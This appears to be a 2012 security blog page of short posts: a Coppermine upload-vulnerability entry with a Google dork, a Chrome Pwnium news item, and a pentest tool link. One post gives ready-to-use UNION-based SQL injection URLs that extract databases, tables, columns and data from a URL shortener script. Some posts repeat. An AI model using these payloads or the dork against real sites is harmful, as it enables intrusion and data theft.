... neuere Einträge
Monday, 12. March 2012
Coppermine Photo Gallery – Upload Vulnerability
Am Monday, 12. Mar 2012 im Topic 'Vulnerabilities'
Google dork: “Powered by Coppermine Photo Gallery”
POC: http://[localhost]/Patch/upload.php
File:
jpg, xlx, txt, bmp, doc, mp4, etc
by
fikri-badboy
POC: http://[localhost]/Patch/upload.php
File:
jpg, xlx, txt, bmp, doc, mp4, etc
by
fikri-badboy
Fake Access Point generator
Am Monday, 12. Mar 2012 im Topic 'Web Security'
Chrome hacker wins $60,000
Am Monday, 12. Mar 2012 im Topic 'News'
Less than two weeks after Google launched Pwnium, a competition for hackers to find security exploits in Chrome, the search giant has announced its first winner.
The winner, Sergey Glazunov, was the first to submit an entry in Google's Pwniumcompetition to find security exploits in Chrome.
Info
https://plus.google.com/u/0/116651741222993143554/posts/5Eq5d9XgFqs
The winner, Sergey Glazunov, was the first to submit an entry in Google's Pwniumcompetition to find security exploits in Chrome.
Info
https://plus.google.com/u/0/116651741222993143554/posts/5Eq5d9XgFqs
OWASP Mantra - URL Shortener Script - SQL
Am Monday, 12. Mar 2012 im Topic 'Vulnerabilities'
URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/
SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/
How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...
Exploit-DB URL: http://www.exploit-db.com/exploits/17937/
Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--
Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--
Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--
Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --
Vanguard - Penetration testing tool - Linux
Am Monday, 12. Mar 2012 im Topic 'Pentest'
Vanguard is a comprehensive web penetration testing tool written in Perl that identifies vulnerabilities in web applications. It is an another addition in open source web penetration testing community.
Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection
Download
http://www.blackhatacademy.org/releases/vanguard-public.tgz
Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection
Download
http://www.blackhatacademy.org/releases/vanguard-public.tgz
... ältere Einträge